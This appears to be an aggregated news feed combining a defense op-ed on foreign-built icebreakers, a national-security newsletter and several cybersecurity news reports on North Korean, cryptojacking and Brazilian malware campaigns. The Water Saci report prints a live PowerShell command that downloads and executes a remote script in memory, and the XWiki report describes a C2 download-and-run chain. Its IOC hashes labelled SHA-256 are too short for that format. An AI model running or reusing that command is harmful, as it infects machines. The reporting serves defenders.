• The current administration and its predecessor have brought sustained attention to the urgent strategic problem of American shipbuilding, but a prospective deal for icebreakers could place this essential work in jeopardy.

    On October 9, President Trump signed a memorandum of understanding with Finland for a “block buy” of U.S. Coast Guard icebreakers, with the first four to be built in Finnish shipyards followed by seven to be built in American ones. Jerry Hendrix, a longtime friend and colleague (and past contributor to this publication) who now leads the White House Shipbuilding Office, celebrated online that “President Trump’s command of the Art of the Deal was on full display” and suggested that the same model could allow foreign construction of U.S. Navy warships. However, President Trump’s deal may in hindsight be remembered as an expression of the art of the giveaway, particularly if he allows this precedent to affect his upcoming engagements with South Korea this week. Far from the answer to America’s shipbuilding woes, agreeing to outsource warship production overseas is mutually exclusive with the strategically vital and bipartisan project of an American maritime renaissance, and instead risks putting that shared objective out of reach.

    The sovereign ability to build the fleet needed on a relevant timeline and at an affordable cost is worth far more than any short-term infusion of foreign-built hulls. History is instructive. The U.S. Navy’s victory in the Battle of Midway is remembered as the product of Adm. Chester Nimitz’s daring “calculated risk” to commit virtually all the Pacific Fleet’s remaining capital ship strength to ambush a more powerful Japanese force. Nimitz could only make this bold gamble because he knew that a fleet much larger than the one he might lose in the coming engagement was nearing completion in American shipyards. Even in the event of tactical defeat, America could replace her losses while Japan could not. Indeed, after a year of fighting, four of the U.S. Navy’s six frontline aircraft carriers in commission at war’s opening lay at the bottom of the Pacific, a shockingly aggressive attrition rate that could only be accepted or sustained because of America’s shipbuilding juggernaut. The logic remains true: ships win battles; shipyards win wars.

    Regrettably, America’s maritime industry is not what it was in 1942. The United States is suffering the results of two disastrous policy choices in the 1980s and 1990s, first to cut off government support to U.S. commercial shipping and shipbuilding, allowing both those industries to wither; and then to encourage consolidation of the remaining naval shipbuilding base into uncompetitive and underperforming monopoly-monopsony relationships. President Trump has evidently been persuaded of the central thesis underlying the Maritime Statecraft strategy that I helped conceptualize and implement beginning in 2022 under the leadership of Navy Secretary Carlos Del Toro. That thesis: market competition via investment in U.S. shipyards by world-class commercial and naval shipbuilders from U.S. allies is the only way to jolt domestic industry into building the ships America needs on time and on budget. This approach has already yielded formidable results, with one of Korea’s foremost shipbuilders, Hanwha, purchasing the Philly Shipyard last year and committing to invest $5 billion to modernize its facilities, double the workforce, and multiply output tenfold. Likewise, Finnish and Canadian icebreaker specialist Davie Shipbuilding last year declared its intention to purchase a shipyard in Texas to bring the firm’s icebreaking prowess to American shores. All this and more was gained without the U.S. government having to accede to outsourcing construction of a single new ship abroad.

    While President Trump has until now admirably carried forward and expanded on these accomplishments, his move to outsource icebreakers could run the whole enterprise aground.

    There are a number of well-founded reasons why the United States does not and should not outsource its naval shipbuilding abroad. One is the need to assure technical security of U.S. designs and systems against foreign compromise. Another is the strategic vulnerability of the most relevant allied shipyards, all of which lie within reach of either China or Russia’s plentiful arsenals of short-range missiles. But the most compelling rationale is the business case. America’s most powerful leverage to induce world-class shipbuilders to invest in U.S. shipyards is access to the highly lucrative U.S. government and naval shipbuilding market. The model espoused by President Trump surrenders America’s best negotiating position for little gain, and could even undo the progress made thus far. Why would a foreign shipbuilder expend time and treasure to bring their technology, expertise, and best practices to America to capture U.S. government business tomorrow if the U.S. government chooses to give its business overseas for nothing concrete in return today? An appropriately hard-nosed deal would both require and support allied shipbuilders to complete the whole block buy in the United States via their new American subsidiaries. Instead, President Trump’s agreement to outsource, even as a nominal stopgap, not only slows foreign investment in America but disincentivizes it, effectively punishing firms that have moved out quickly on a U.S. investment while rewarding those that have dragged their feet.

    Moreover, President Trump’s deal as now structured is entirely dependent on the continuing good faith of the foreign shipyard, a perilous disposition of risk even with the most forward-leaning partner. What would stop a foreign shipbuilder from reaping the profitable fruits of the initial outsourced ships before reneging on their promised U.S. investments over some genuine or pretended obstacle, leaving “no choice”—they would claim—but for the entire order to be completed overseas? Given the difficulties that are almost certain to arise in onshoring shipbuilding expertise and technologies, America needs all the leverage she can muster to ensure foreign shipbuilders follow through with their long-term commitments.

    The next inflection point could be just around the corner with the Asia Pacific Economic Community summit in South Korea, an ally of surpassing importance in an American maritime revival. In tariff negotiations this summer, the Trump administration gained what could prove to be a major advance in the form of the South Korean government’s “Make American Shipbuilding Great Again” proposal, which offered $150 billion in loans and loan guarantees to facilitate investment by South Korean firms into the U.S. shipbuilding industry. This initiative notably did not insist on U.S. government outsourcing, the South Korean government having rightly designed a durable framework that recognizes and conforms with the longstanding U.S. laws and strategic imperatives that require U.S. warship construction to take place in the United States. But the precedent set by the administration’s icebreaker agreement with Finland, combined with President Trump’s off-the-cuff comments with the president of South Korea in August that appeared to open the door to outsourcing, could upend this far more significant prospective accomplishment of expanded Korean investment in the U.S. shipbuilding industry. This week’s summit, where President Trump hopes to finalize the trade deal with South Korea and may visit a South Korean shipyard, could therefore prove to be a make-or-break moment for America’s maritime statecraft.

    Given the business incentives at work, continuing down the path of the icebreaker deal and further surrendering to the siren song of outsourcing would make it much more likely that President Trump’s thus-far nominal victory from trade negotiations with South Korea will remain an unrealized paper promise. This would throw away a historic opportunity and the chance for a lasting legacy of steel, concrete and jobs on U.S. waterfronts. It would, instead, mortgage America’s maritime future for the short-term sugar high of a brace of foreign-built ships.

    A wiser course would be to stand firm on the sound logic, established law, and trusty leverage of the negotiating position that America only builds her warships in America, while holding the door open wide for world-class shipbuilders wishing to join that noble endeavor to bring their talents here. Only sustained long-term investment in the United States by preeminent allied shipbuilding players can restore the health of American seapower.

    Hunter Stires served as the Maritime Strategist to the 78th Secretary of the Navy, where he was recognized for his work as one of the principal architects of the Maritime Statecraft strategy. 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The BlueNoroff threat group, also tracked as Sapphire Sleet, APT38, and TA444, has significantly evolved its targeting capabilities with sophisticated new infiltration strategies designed specifically to compromise C-level executives and senior managers within the Web3 and blockchain sectors.

    The group, historically focused on financial gain through cryptocurrency theft, has unveiled two coordinated campaigns dubbed GhostCall and GhostHire that represent a substantial shift in both technical sophistication and social engineering tactics.

    Securelist analysts and researchers identified these campaigns beginning in April 2025, revealing a multi-faceted approach that combines deceptive video conferencing infrastructure with advanced malware deployment chains.

    The GhostCall campaign predominantly targets macOS users at technology companies and venture capital firms through fraudulent investment-related meetings, while GhostHire focuses on Web3 developers using fake recruitment processes.

    Both campaigns demonstrate the group’s ability to leverage generative AI for crafting convincing phishing materials and enhancing social engineering effectiveness.

    Overall behavior of the phishing site (Source – Securelist)

    The emergence of these campaigns marks a deliberate platform shift from Windows to macOS systems, deliberately chosen to align with the target demographic’s predominantly Apple-based infrastructure.

    This strategic decision enables the group to deploy specifically engineered malware chains optimized for macOS environments, creating significantly fewer detection opportunities across typical enterprise security stacks.

    Attack Vector Innovation: The Fake Video Call Infrastructure

    The GhostCall campaign employs an innovative attack mechanism centered on fabricated Zoom and Microsoft Teams environments hosted on attacker-controlled domains.

    Victims receive Telegram-based invitations to investment meetings featuring phishing URLs mirroring legitimate conference platforms.

    Upon joining fake calls, targets encounter carefully staged scenes displaying video recordings of previously compromised victims rather than deepfakes, creating convincing authenticity.

    Initial infection flow (Source – Securelist)

    The interface then prompts users to download supposed SDK updates, which actually deliver malicious AppleScript files containing nearly 10,000 blank lines designed to obscure malicious payload extraction.

    The infection chains employ sophisticated code injection techniques utilizing the proprietary GillyInjector framework.

    The AppleScript executes a curl command downloading additional stages, ultimately installing modular malware components including CosmicDoor backdoors, RooTroy downloaders, and SilentSiphon stealer suites.

    Most notably, the stealer modules comprehensively harvest sensitive data spanning cryptocurrency wallets, browser credentials, SSH keys, cloud infrastructure tokens, DevOps configurations, and Telegram account sessions.

    The technical implementation showcases unprecedented sophistication, leveraging RC4 encryption for configuration management, AES-256 algorithms for payload protection, and strategic TCC database manipulation enabling unrestricted system access without user consent prompts.

    This represents a significant maturation in the group’s operational capabilities and underscores the critical risks facing cryptocurrency industry executives.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post BlueNoroff Hackers Adopts New Infiltration Strategies To Attack C-Level Executives, and Managers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Mozilla is implementing a significant transparency requirement for Firefox extensions, mandating that all new browser add-ons disclose their data collection practices to users before installation.

    Starting November 3rd, 2025, developers submitting fresh extensions to the Firefox ecosystem must declare whether their software collects or transmits personal data through a new standardized framework embedded in the extension’s core configuration files.

    The new data transparency initiative requires extension developers to specify data collection permissions directly within the manifest.json file using the browser_specific_settings.gecko.data_collection_permissions key.

    This standardized approach provides Mozilla with consistent metadata about extension behavior across its entire add-on ecosystem.

    Extensions that do not collect or transmit any user data must explicitly declare this fact by setting the appropriate “none required” data collection permission in the property, ensuring that privacy-respecting tools receive proper recognition.

    Data Collection Policies for Extensions

    Developers should note that this requirement applies exclusively to new extensions submitted after November 3rd.

    Updated versions of existing extensions are not subject to the mandate during the initial rollout phase, allowing the developer community time to integrate the new framework into their existing projects.

    However, once any extension begins utilizing these data_collection_permissions keys in a new version, it must continue implementing them for all subsequent releases.

    permission of data collection with fallback
    Permission for data collection with fallback

    Extensions failing to comply with requirements when necessary will be blocked from submission to addons.mozilla.org for signing, with clear explanatory messages guiding developers toward compliance.

    The disclosed data collection information will be displayed prominently across multiple Mozilla platforms, providing users with comprehensive visibility into extension behavior.

    When installing an extension, users will see the data collection details displayed alongside traditional permission prompts, creating a unified authorization experience.

    permission of extension without data collection
    permission for extension without data collection

    This information will also appear on the addons.mozilla.org extension listing page and within the Permissions and Data section of Firefox’s about:addons management interface.

    To maintain compatibility with older Firefox versions, developers supporting Firefox versions prior to 140 on Desktop or 142 on Android must provide users with alternative in-extension controls for managing data collection and transmission immediately after installation.

    This backward compatibility consideration ensures that the transition does not alienate users running legacy Firefox versions.

    Mozilla is adopting a gradual implementation strategy, beginning with new extensions in November 2025, while planning to extend the requirement to all existing extensions in the first half of 2026.

    The company has committed to providing substantial advance notice through the add-ons blog before mandating compliance for legacy extensions, giving developers adequate preparation time.

    Furthermore, Mozilla is developing new features to facilitate this transition for both extension developers and end users, though details remain forthcoming.

    The initiative represents Mozilla’s broader commitment to browser transparency and user privacy, positioning Firefox as a leader in requiring verifiable disclosure of data practices before users grant extensions system access.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Mozilla Wants All New Firefox Extensions to Disclose Data Collection Policies appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical remote code execution (RCE) flaw in XWiki, a popular open-source wiki platform, was exploited in the wild to deploy cryptocurrency mining malware on compromised servers.

    The vulnerability, tracked as CVE-2025-24893, allows unauthenticated attackers to inject malicious templates and execute arbitrary code, bypassing authentication entirely.

    This discovery highlights the growing threat to web applications, where real-world attacks often outpace official alerts from bodies like CISA’s Known Exploited Vulnerabilities (KEV) catalog.

    VulnCheck, a vulnerability intelligence firm, reported the exploitation based on data from their Canary network, which simulates vulnerable systems to detect attacks.

    Unlike earlier reports from Cyble, Shadow Server, and CrowdSec that noted mere exploit attempts, VulnCheck’s observations reveal a sophisticated two-stage attack chain originating from an IP address in Vietnam.

    The flaw, added to VulnCheck KEV in March 2025, involves template injection in XWiki’s SolrSearch endpoint, enabling attackers to run Groovy scripts for command execution.

    This absence from CISA KEV underscores how exploitation can surge before formal recognition, leaving organizations exposed.

    The Two-Stage Exploitation Process

    The attack unfolds in two phases, separated by at least 20 minutes, to evade detection.

    In the initial request, attackers send a URL-encoded GET to the SolrSearch endpoint, injecting an asynchronous Groovy payload that uses wget to download a downloader script named x640 from a command-and-control (C2) server at 193.32.208.24:8080.

    This script saves to /tmp/11909 on the target system. The payload mimics legitimate browser traffic with a Firefox user agent to blend in.

    Approximately 20 minutes later, a second request executes the staged file by invoking bash on /tmp/11909. The downloader then fetches two additional scripts, x521 and x522, piping them directly to bash for execution, VulnCheck said.

    These scripts handle the payload delivery: x521 creates directories in /var/tmp, downloads the coinminer binary tcrond from the same C2, and sets executable permissions.

    Meanwhile, x522 cleans the environment by killing competing miners like xmrig and kinsing, clears history logs, and launches tcrond with a configuration pointing to auto.c3pool.org on port 80.

    The miner, UPX-packed for obfuscation, uses a Monero wallet address for payouts, indicating a low-sophistication but persistent operation.

    All traffic traces back to 123.25.249.88, flagged in multiple AbuseIPDB reports for abusive activity.

    Key Indicators

    Defenders can use these indicators to hunt for similar activity across networks. The exploitation leverages transfer.sh for hosting payloads, a common tactic in cryptojacking campaigns.

    Indicator TypeDetails
    IP Addresses123.25.249.88 (Attacker, Vietnam); 193.32.208.24 (C2 Server)
    File Hashes (SHA-256)tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10; tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b; x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed; x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f; x640: 5abc337dbc04fee7206956dad1e0b6d43921a868
    CVSS Score9.8 (Critical) – Unauthenticated RCE via template injection in XWiki versions prior to 15.10.6
    Affected ProductsXWiki Enterprise, XWiki Standard; Impacts web servers running vulnerable instances

    Organizations using XWiki should patch immediately to version 15.10.6 or later, monitor for anomalous wget traffic, and scan for these IOCs.

    VulnCheck’s Canaries demonstrate the value of proactive threat intelligence in bridging gaps left by delayed official listings.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post XWiki RCE Vulnerability Actively Exploted In Wild To Deliver Coinminer appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have disclosed details of a new Android banking trojan called Herodotus that has been observed in active campaigns targeting Italy and Brazil to conduct device takeover (DTO) attacks. “Herodotus is designed to perform device takeover while making first attempts to mimic human behaviour and bypass behaviour biometrics detection,” ThreatFabric said in a report shared with

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Organizations today face constant threats from malware, including ransomware, phishing attacks, and zero-day exploits. These threats are evolving faster than ever.

    Threat intelligence feeds emerge as a game-changer, delivering real-time, actionable data that empowers security teams to detect and neutralize attacks before they cause widespread damage.

    These feeds aggregate indicators of compromise such as IP addresses, domains, URLs, and file hashes from global sources, enriched with context like malware family labels and severity scores.

    By integrating this intelligence into security operations centers, companies can shift from reactive firefighting to proactive defense, significantly reducing breach impacts.

    ANY.RUN, a leading provider of malware analysis, illustrates this through its cloud-based sandbox platform. Drawing from over 16,000 daily user-submitted tasks by a community of 500,000 analysts and 15,000 enterprises, their feeds process indicators with proprietary algorithms to filter false positives.

    Available in STIX or MISP formats, these streams update in near real-time, offering timestamps, related objects, and external references to sandbox sessions.

    This structure allows seamless integration with SIEM, SOAR, and firewall systems, automating threat enrichment and response.

    Incident Triage 

    During incident triage, where alerts flood in and every second counts, threat intelligence feeds cut through the noise. Security analysts use them to correlate incoming signals with known IOCs, validating true positives and prioritizing high-risk events.

    For instance, if an intrusion detection system flags a suspicious IP, the feed might reveal its ties to a Lynx ransomware command-and-control server, complete with campaign details and first-seen dates.

    This context enables immediate actions like endpoint isolation, slashing mean time to detect, and minimizing resource waste on false alarms.

    In a real-world scenario, a financial institution spotted an outbound connection to an unfamiliar IP. Cross-referencing with a feed confirmed its malicious nature, linked to a ransomware group.

    The team escalated the alert, blocked the connection, and averted a data breach, all within minutes. Such capabilities not only boost compliance with regulations like GDPR but also protect revenue by preventing costly disruptions.

    Beyond triage, feeds fuel proactive threat hunting by guiding analysts through network logs and endpoint data. Hunters can correlate IOCs with tactics, techniques, and procedures, uncovering hidden anomalies like phishing domains targeting e-commerce.

    A retail firm, for example, used feed data on a new ransomware payload to scan logs, identifying and quarantining a compromised endpoint before infection spread, safeguarding customer data and brand trust.

    In post-incident analysis, feeds aid reconstruction by mapping attacks to global trends. After a manufacturing breach via spear-phishing, a team traced the incident to a nation-state actor using unpatched exploits and custom scripts.

    Feed insights prompted patches, new detection rules, and training, reducing mean time to recover and strengthening defenses against similar threats.

    Threat intelligence feeds like ANY.RUN’s deliver broader benefits, including early detection of emerging malware, faster response times, and data-driven decisions that align security with business goals.

    By automating IOC ingestion, they lower remediation costs, increase uptime, and foster a proactive posture. As cyber threats intensify, adopting these feeds isn’t just smart, it’s essential for staying ahead.

    Enhance your SOC Performance and Reduce Business Risk with TI Lookup => Try Now

    The post How Threat Intelligence Feeds Help Organizations Quickly Mitigate Malware Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat actors tied to North Korea have been observed targeting the Web3 and blockchain sectors as part of twin campaigns tracked as GhostCall and GhostHire. According to Kaspersky, the campaigns are part of a broader operation called SnatchCrypto that has been underway since at least 2017. The activity is attributed to a Lazarus Group sub-cluster called BlueNoroff, which is also known as APT38,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Developing: The U.S. Navy has evacuated hundreds of defense personnel from Naval Station Guantanamo Bay as the category-5 Hurricane Melissa barrels northeast through the Caribbean Sea. The evacuations routed nearly 900 “non-mission essential personnel” from the base in Cuba to Naval Air Station Pensacola this past weekend, Navy officials said Monday. 

    About the storm: “Hurricane Melissa is just hours from a historic, catastrophic Category 5 landfall in Jamaica today with life-threatening flash flooding, landslides, destructive winds and storm surge in one of the strongest landfalls on record anywhere in the Atlantic Basin,” the Weather Channel reported Tuesday morning. “In eastern Cuba, tropical storm winds are expected starting today, with hurricane-force winds arriving tonight into Wednesday morning.”

    In video: The U.S. Air Force shared footage of enormous swirling, fluffy clouds from high above the hurricane on Monday. The service says aircrew from its 53rd Weather Reconnaissance Squadron flew “multiple passes through the storm to collect critical weather data for the National Hurricane Center.” Pick through three videos posted to DVIDS on Monday here, here, and here

    Meanwhile: “U.S. military aircraft have continued to carry out flights off the coast of Venezuela, including a B-1B Lancer bomber mission on Monday, which skirted south of Hurricane Melissa,” the Washington Post reported Monday evening. 

    Track the course of that B-1B mission via FlightRadar24 or an open-source flight tracker posting updates to social media.

    Legal considerations: The White House’s ongoing war on alleged drug-running boats around Latin America “is bringing into sharper view a structural weakness of law as a check on the American presidency,” Charlie Savage of the New York Times reported Monday. How so? “[A]dministration officials have clammed up when asked for the legal analysis to support their assertion that there is a legal state of armed conflict that makes the killings lawful.”

    “Even in closed-door congressional briefings, according to people familiar with them, officials have provided no detailed legal answers,” Savage reports. As a result, the president “is blurring a line between enforcing the law and waging a war,” which leaves him “able to dictate his own factual and legal realities, and executive branch lawyers who want to keep their jobs must treat them as settled.”

    Expert reax: “The men and women who volunteered to serve this nation and engage in the most morally challenging conduct imaginable—killing someone who is not immediately threatening you—have a right to know the nation will not order them to engage in that deadly endeavor unless it is genuinely justified both legally and morally,” said former Army JAG Geoffrey Corn, who is now a criminal and military law professor at Texas Tech University. “The service members who conduct attacks have to live the rest of their lives with the memory,” he said. Continue reading (gift link), here

    Related reading:A federal agent’s daring plan: Recruit Maduro’s pilot to turn on the Venezuelan leader,” via the Associated Press reporting Tuesday from Miami. 

    Coverage continues below…


    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1922, fascists took over the Italian government, led by Benito Mussolini, whose despotic rule would last for nearly two decades.

    Defense civilians and other feds abroad are fretting about making rent during the government shutdown, Government Executive’s Eric Katz reported Monday. For civilian federal employees stationed overseas, the government shutdown—poised to enter its fourth week after a weekend of inactivity in Congress—is bringing a range of unique challenges. Among them: losing not just their pay but their various government-provided housing allowances and other stipends. 

    Eschewing political compromise to end the shutdown, President Trump has, without congressional authorization, shifted funds to ensure troops in uniform receive their pay on time. Civilians—both those furloughed and working through the shutdown—are now missing paychecks. Story, here

    Developing: Pentagon chief Pete Hegseth is planning to deliver a “major defense reform speech” on Nov. 7, Politico reported Monday. The event appears to be “the first time in recent memory a Defense secretary has assembled industry executives for a speech,” and it’s expected to happen at the National Defense University in Washington. Read more behind the paywall at Politico Pro

    Want up to 19 tons of weapons-grade plutonium? Apply at the Energy Department. Last week, DOE began taking applications from companies that want to buy plutonium as part of a program to encourage the development of nuclear reactors that might slake the needs of the power-hungry AI industry, the Financial Times reported (paywall).

    One of the likely candidates is Oklo, a “nuclear startup” that in October was chosen by DOE to join a reactor-development pilot program. Oklo is backed by, and was formerly chaired by, OpenAI CEO Sam Altman. The winning applicants are to be announced on Dec. 31, Futurism wrote in a separate article.

    Concerns? Sure. “If there were adults in the room and I could trust the federal government to impose the right standards, it wouldn’t be such a great concern, but it just doesn’t seem feasible,” Edwin Lyman, a physicist with the Union of Concerned Scientists, told the Financial Times. Read on, here.

    Additional reading: 

    Trump 2.0

    Trump and his family are in business with Gulf monarchies. That’s not news, but a lengthy new piece from Forbes traces the thickening strands of unprecedented financial entanglement between the U.S. president and the power players of a region of strategic importance.

    In crypto alone, the Trump family has made more than $800 million this year, with billions more in unrealized “on paper” gains, a Reuters examination found. “Much of that cash has come from foreign sources…” Read on, here.

    ICYMI: The president’s conflicts of interest have only grown since January, when Defense One posted a roundup. “I think that that people have essentially internalized and normalized that we have a president coming in who is going to disregard basic ethical principles and use the presidency for his own benefit, in ways that might result in decisions that are not in the interest of the American people,” CREW President Noah Bookbinder said in January. Review that, here.

    Additional reading:Peter Thiel-Backed Startup Secures $100 Million to Make Chips in U.S.,” the Wall Street Journal reported Tuesday. 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated malware campaign targeting Brazilian users has emerged with alarming capabilities.

    The Water Saci campaign, identified by Trend Micro analysts as leveraging the SORVEPOTEL malware, exploits WhatsApp as its primary distribution vector for rapid propagation across victim networks.

    First identified in September 2025, the campaign evolved dramatically by October 2025, introducing a new script-based attack chain that diverges significantly from previously observed .NET-based methods.

    The malware demonstrates remarkable resilience through multi-vector persistence mechanisms and advanced command-and-control infrastructure that grants attackers unprecedented real-time operational control over compromised systems.

    Trend Micro analysts identified that the campaign automatically distributes malicious ZIP files to all contacts and groups associated with compromised WhatsApp accounts, creating exponential spread potential.

    On October 8, 2025, researchers revealed file downloads originating from WhatsApp web sessions, specifically identifying files named Orcamento-2025*.zip.

    Rather than employing traditional .NET binaries, the evolved chain orchestrates payload delivery through a combination of Visual Basic Script downloaders and PowerShell scripts, facilitating fileless execution that evades conventional security detection methods.

    The infection mechanism begins when users download and extract malicious ZIP archives containing an obfuscated VBS downloader named Orcamento.vbs.

    New Water Saci attack chain observed (Source – Trend Micro)

    This component executes a PowerShell command that performs fileless execution via New-Object Net.WebClient, downloading and executing the PowerShell script tadeu.ps1 directly in memory.

    The deobfuscated code reveals:-

    shell. Run "powershell -ep bypass ""[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://cld.pt/dl/download/ac23c304-aa9d-4d27-a845-272ec4de533d/sapotransfer-640a60194938bL1/tadeu.ps1?download=true'))"", 0, True

    Email-Based Command Infrastructure and Advanced Persistence

    The SORVEPOTEL backdoor implements a sophisticated dual-channel communication architecture that fundamentally distinguishes it from conventional banking trojans.

    Rather than relying on traditional HTTP-based command-and-control systems, the malware leverages IMAP connections to terra.com.br email accounts using hardcoded credentials to retrieve operational commands.

    This email-based infrastructure provides remarkable resilience, allowing threat actors to maintain control even when primary C&C servers face disruption.

    Upon establishing persistence through registry modifications and scheduled task creation using WinManagers.vbs in C:\ProgramData\WindowsManager\, the backdoor queries email inboxes every thirty minutes to extract multiple types of URLs including primary data endpoints, backup infrastructure URLs, and PowerShell payload delivery links.

    The malware employs an HTTP-based polling system as its secondary communication channel, sending POST requests to extracted C&C servers every five seconds with the action parameter get_commands.

    This multi-layered approach ensures operators can pause, resume, and monitor campaign activity in real time, effectively converting infected machines into a coordinated botnet.

    The backdoor executes over twenty distinct commands, ranging from system information gathering and process management to screenshot capture, file operations, and system power control, granting attackers comprehensive remote access capabilities that position SORVEPOTEL as a full-featured backdoor with sophisticated operational flexibility and devastating potential for financial institutions and enterprises across Brazil.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Brida security testing toolkit has released version 0.6, marking a significant update that brings full compatibility with the latest Frida dynamic instrumentation framework. This new release addresses critical compatibility gaps that emerged after Frida’s major overhaul in May 2025, restoring comprehensive functionality for security researchers and penetration testers working with Burp Suite. Adapting to […]

    The post Brida Introduces New Release Offering Complete Support for Latest Frida Integration appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶